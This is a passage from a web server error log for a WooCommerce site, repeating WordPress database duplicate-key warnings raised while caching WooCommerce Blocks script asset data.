s:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.630685 2026] [lsapi:warn] [pid 817651:tid 817873] [client 45.13.225.123:33208] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.632289 2026] [lsapi:warn] [pid 817651:tid 817873] [client 45.13.225.123:33208] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.632562 2026] [lsapi:warn] [pid 823496:tid 823751] [client 45.13.225.123:33132] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.633836 2026] [lsapi:warn] [pid 823496:tid 823751] [client 45.13.225.123:33132] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.649736 2026] [lsapi:warn] [pid 823496:tid 823652] [client 45.13.225.123:33224] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.651200 2026] [lsapi:warn] [pid 823496:tid 823652] [client 45.13.225.123:33224] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', 